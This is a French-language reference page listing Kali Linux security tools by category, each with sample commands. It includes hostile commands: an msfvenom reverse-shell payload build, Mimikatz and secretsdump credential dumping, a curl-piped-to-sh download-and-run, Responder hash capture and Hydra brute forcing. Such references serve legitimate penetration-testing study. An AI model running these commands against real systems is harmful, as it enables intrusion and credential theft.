Explorez les 130+ outils inclus dans Kali Linux, triés par catégorie
Scanner de réseau et de ports le plus connu. Découverte d'hôtes, fingerprinting OS, et détection de services.
nmap -sV -sC target.com
nmap -A -T4 192.168.1.0/24
nmap --script vuln target.com
Outil de visualisation de relations et d'analyse de renseignement (OSINT). Cartographie de données pubs.
maltego
Framework de reconnaissance OSINT complet. Module à l'image de Metasploit pour la collecte de données.
recon-ng
workspaces create project1
modules install brute_hosts
Collecte d'emails, sous-domaines, noms d'hôtes et IPs à partir de sources publiques.
theHarvester -d target.com -b google,linkedin
Moteur de recherche pour les appareils IoT et services réseau connectés à Internet.
shodan search apache country:FR
shodan host 8.8.8.8
Requêtes DNS et information sur les domaines. Résolution de noms et information WHOIS.
whois target.com
dig target.com ANY
nslookup target.com
Découverte d'hôtes réseau via ARP. Identification des appareils connectés au réseau local.
netdiscover -r 192.168.1.0/24
netdiscover -i eth0 -l scan.pcap
Énumération DNS avancée : zone transfer, sous-domaines, enregistrements records.
dnsrecon -d target.com -t std
dnsrecon -d target.com -t axfr
Scanner de serveur web. Détecte les fichiers dangereux, les CGI obsolètes, et les problèmes de config.
nikto -h http://target.com
nikto -h target.com -p 8080
Scanner de vulnérabilités complet et gratuit. Alternative open-source à Nessus.
gvm-start
Énumération de dossiers et fichiers cachés sur les serveurs web via dictionnaires.
dirb http://target.com
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt
feroxburst -u http://target.com -w wordlist.txt
Énumération des services SMB/Samba. Extraction d'informations sur les partages et utilisateurs.
enum4linux-ng -A 192.168.1.10
Énumération de sous-domaines et cartographie d'infrastructure externe pour OSINT.
amass enum -passive -d target.com
amass enum -active -d target.com
Framework d'exploitation le plus puissant. Milliers d'exploits, payloads, et modules post-exploitation.
msfconsole
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 -f exe -o shell.exe
Outil automatisé de détection et d'exploitation d'injections SQL. Prend en charge tous les SGBD.
sqlmap -u "http://target.com/?id=1" --dbs
sqlmap -r request.txt --dump
Framework d'ingénierie sociale. Phishing, clonage de sites, et payloads avancés.
setoolkit
Browser Exploitation Framework. Utilise les vulnérabilités du navigateur pour le contrôle à distance.
beef-xss
Interface graphique pour Metasploit. Visualisation de réseau et exploitation interactive.
armitage
Extraction de credentials Windows : mots de passe en clair, Kerberos tickets, NTLM hashes.
sekurlsa::logonpasswords
lsadump::sam
kerberos::list
Cartographie d'Active Directory. Identifie les chemins d'attaque vers le Domain Admin.
bh
SharpHound.exe -c All
Collection d'outils Python pour protocoles réseau Windows. PsExec, WMIExec, Kerberos.
impacket-psexec domain/user:password@target
impacket-secretsdump domain/user:password@target
Scripts d'énumération automatique pour Linux et Windows. Trouve les vecteurs d'escalade de privilèges.
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
.\winPEAS.exe
Poisoning LLMNR, NBT-NS et MDNS. Capture des hashes NTLMv2 sur le réseau local.
responder -I eth0 -wrf
Analyseur de protocoles réseau. Capture et analyse de paquets en temps réel.
wireshark
tshark -i eth0 -f "tcp port 80"
Framework MITM complet. ARP spoofing, DNS spoofing, sniffing, et injection de packets.
bettercap -iface eth0
net.probe on; net.sniff on; arp.spoof on
Outil MITM pour ARP poisoning, DNS spoofing, et filtrage de contenu.
ettercap -G
ettercap -T -M arp // //
Analyseur de paquets en ligne de commande. Capture réseau légère et puissante.
tcpdump -i eth0 -w capture.pcap
tcpdump -r capture.pcap host 192.168.1.1
Casseur de mots de passe. Supporte des centaines de formats de hash.
john --wordlist=rockyou.txt hash.txt
john --format=raw-md5 hash.txt
Casseur de mots de passe GPU. Le plus rapide pour les attaques par force brute et dictionnaire.
hashcat -m 0 hash.txt rockyou.txt
hashcat -a 3 -m 0 hash.txt ?a?a?a?a
Brute force en ligne. HTTP, SSH, FTP, SMB, et des dizaines d'autres protocoles.
hydra -l admin -P wordlist.txt ssh://target
hydra -l admin -P wordlist.txt http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"
Brute force parallèle sur plusieurs protocoles réseau. Alternatives à Hydra.
medusa -h target -u admin -P wordlist.txt -M ssh
ncrack -p ssh target
Générateur de wordlists personnalisées basé sur des critères définis.
crunch 8 8 -t @@@@1234 -o wordlist.txt
crunch 4 4 -f /usr/share/crunch/charset.lst numeric
Suite complète d'audit WiFi : monitoring, capture, injection, et cracking WPA/WEP.
airmon-ng start wlan0
airodump-ng wlan0mon
airodump-ng -c 6 --bssid XX:XX:XX -w capture wlan0mon
aircrack-ng -w rockyou.txt capture-01.cap
Automatisation des attaques WiFi. Supporte WEP, WPA, et WPS.
wifite
wifite --wpa --dict rockyou.txt
Détecteur de réseaux sans fil, sniffing, et analyse de trafic 802.11.
kismet -c wlan0
Evil Twin / Rogue AP avancé. Capture de credentials et attaques mitM WiFi.
hostapd-mana hostapd-mana.conf
Plateforme d'analyse forensique numérique. Analyse de disques, timeline, et artefacts.
autopsy
Analyse forensique de mémoire RAM. Extraction de processus, réseaux, et artefacts.
volatility -f mem.raw imageinfo
volatility -f mem.raw --profile=Win7SP1x64 pslist
Analyse et extraction de firmware. Identifie les fichiers embarqués dans les images binaires.
binwalk firmware.bin
binwalk -e firmware.bin
Récupération de fichiers (file carving). Reconstruction de fichiers supprimés depuis des images disques.
foremost -i image.dd -o recovered/
scalpel image.dd -o output/
Kit de test de sécurité web. Proxy, scanner, intruder, et repeater pour pentest web.
burpsuite
Scanner de vulnérabilités WordPress. Détecte les plugins, thèmes vulnérables et config faible.
wpscan --url http://target.com
wpscan --url http://target.com --enumerate vp,vt,u
Scanner de sécurité web gratuit. Alternatives open-source à Burp Suite Pro.
zaproxy
Outil automatisé d'injection de commandes OS. Détecte et exploite les vulnérabilités d'injection.
commix -u "http://target.com/page?id=1"
Outil de reverse engineering de la NSA. Décompilateur et désassembleur multi-architectures.
ghidraRun
Framework de reverse engineering en ligne de commande. Désassemblage, debug, et analyse.
r2 -A binary
aaa; pdf @main
GNU Debugger avec extensions pour l'exploitation et l'analyse de binaires.
gdb ./binary
gef info functions
break main; run
Extraction automatique de strings obfusquées dans les binaires malveillants.
floss malware.exe